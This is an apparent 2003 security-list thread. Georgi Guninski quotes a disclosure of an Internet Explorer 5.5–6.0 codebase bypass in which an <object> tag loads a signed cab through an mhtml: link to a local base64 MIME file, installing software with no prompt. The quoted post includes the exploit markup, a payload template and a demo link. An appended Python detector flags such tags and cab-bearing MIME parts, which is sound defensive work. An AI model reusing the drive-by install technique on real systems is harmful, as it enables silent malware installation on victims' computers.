From: guninski at guninski.com (Georgi Guninski)
Subject: SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0
Have the users at Microsoft fixed reinstalling of bugware signed by them?
outlctl.dll (amongst other stuff) used to be a disguised frontend to cmd.exe and
was quite signed.
IIRC at a time Microsoft even wrote in a security bulletin: "remove us from the
trusted publishers in exploder" - has this changed, i.e. are they *now* claiming
they are a trustworthy publisher again?
Georgi
http-equiv@...ite.com wrote:
> Sunday, May 4, 2003
>
>
> Silent delivery and installation of an executable on the target
> machine, default install of win98 and Internet Explorer with all
> patches to date. No client input other than viewing a web page:
>
> Mildly amused by the recent patching of the codebase saga spanning
> nearly 3 years now, we put on our thinking caps and come to the very
> simple, yet delicious conclusion:
>
> As below we are able to inject arbitrary html into the local computer
> zone thus bypassing the browser's security. Nevertheless the codebase
> exploits as detailed time and time again, now no longer function,
> returning the standard active x error or security warning.
>
> BUT !
>
> there is a very specific reason for that and to bypass it, we do like
> so:
>
> ----local.html----
>
> <object CLASSID="CLSID:55555555-5555"
> codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
> File://malware.cab">
>
> ----local.html----
>
> and where our:
>
> ---wecerr.txt---
> MIME-Version: 1.0
> Content-Location:File://malware.cab
> Content-Transfer-Encoding: base64
>
> TVNDRgAAAAAyQAYAAAAAAEQAAAAAAAAAAwEBAAIABADJBwAAFAAAAAAAEAAyQAYAgBUAAA
> AAAAAA
>
> ---wecerr.txt---
>
> contains a "signed" cab file. The digital signature is our key.
>
> Provided the executable is signed, we are again able to install via
> the codebase object, from the local machine and without any prompts
> or warnings. Certainly we would not expect malware to be digitally
> signed out in the wild, but for what it is worth, we are back in
> business.
>
> Working Example
>
> http://www.malware.com/aha.html
>
> Caution:
>
> a) for demonstration purposes we use the ubiquitous flash file [.cab
> file] as it is both signed and benign and you are able to visually
> see the install:
>
> [screen shot: http://www.malware.com/aha.png 14KB]
>
> b) the custom crafted wecerr.txt weighs in at a hefty 555 KB, and can
> take a short while to download:
>
> [screen shot: http://www.malware.com/ah.png 4KB]
>
> once downloaded, simply take the:
>
> ----local.html----
>
> <object CLASSID="CLSID:55555555-5555"
> codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
> File://malware.cab">
>
> ----local.html----
>
> and away you go.
>
> Notes:
>
> 1. None
>
> End Call
>
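
Added example, not part of either post: a defender-side check in Python for the two artifacts the quoted message describes, an <object> whose codebase loads through mhtml: or file:, and a base64 MIME part whose payload begins with the cabinet signature MSCF. The function, class and constant names are assumptions of this example; the sample inputs are copied from the quoted post, with the base64 body truncated.

```python
import base64
from html.parser import HTMLParser

CAB_MAGIC = b"MSCF"  # signature at offset 0 of a Microsoft cabinet file
# Sample inputs copied from the quoted post (base64 body truncated).
SAMPLE_HTML = r'''<object CLASSID="CLSID:55555555-5555"
codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
File://malware.cab">'''
SAMPLE_MIME = ("MIME-Version: 1.0\nContent-Location:File://malware.cab\n"
               "Content-Transfer-Encoding: base64\n\nTVNDRgAAAAAyQAYA\n")


class ObjectCodebaseScanner(HTMLParser):
    """Collect <object codebase=...> values that load via mhtml: or file:."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":
            return
        for name, value in attrs:
            if name != "codebase" or not value:
                continue
            url = "".join(value.split())  # values may wrap across lines
            scheme = url.split(":", 1)[0].lower()
            if scheme in ("mhtml", "file"):
                container, _, part = url.partition("!")
                self.findings.append({"scheme": scheme, "container": container, "part": part})


def scan_html(html):
    """Return one finding per suspicious <object codebase> in the markup."""
    scanner = ObjectCodebaseScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def mime_part_is_cab(text):
    """True if a base64 MIME part (headers, blank line, body) holds a cabinet."""
    headers, _, body = text.replace("\r\n", "\n").partition("\n\n")
    if "content-transfer-encoding: base64" not in headers.lower():
        return False
    try:  # 8 base64 characters decode to the first 6 bytes
        return base64.b64decode("".join(body.split())[:8]).startswith(CAB_MAGIC)
    except ValueError:
        return False
```

Run scan_html over cached or proxied page bodies and mime_part_is_cab over files found in temp directories; a hit on both for the same host is the pairing the post relies on.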